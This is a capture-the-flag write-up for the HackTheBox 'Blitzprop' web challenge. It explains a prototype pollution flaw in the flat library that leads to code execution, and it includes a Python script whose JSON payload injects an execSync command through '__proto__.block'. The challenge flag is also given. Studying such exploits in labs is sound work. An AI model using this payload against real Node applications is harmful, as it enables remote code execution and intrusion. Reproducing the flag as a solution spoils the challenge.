Blitzprop

Writeup for Blitzprop (Web) - HackTheBox Cyber Apocalypse CTF (2021) 💜

Video Walkthrough

Challenge Description

To exploit this, you need to use a ‘prototype pollution’ vulnerability within the flat library in order to gain RCE against the target. This requires a request to the server to 'pollute' the JavaScript objects, then a second request to trigger the payload. Overall, it was a really interesting box!

Solution

from pwn import *
import requests

TARGET_URL = 'http://188.166.172.13:31177'

# https://blog.p6.is/AST-Injection/
result = requests.post(TARGET_URL + '/api/submit', json={
    "song.name": "The Goose went wild",
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync(`cp flagz8gWv static/flag`)"
    }
})

flag = requests.get(TARGET_URL + '/static/flag').text
success(flag)

Flag: CHTB{p0llute_with_styl3}

PreviousWeb NextE-Tree

Last updated 3 months ago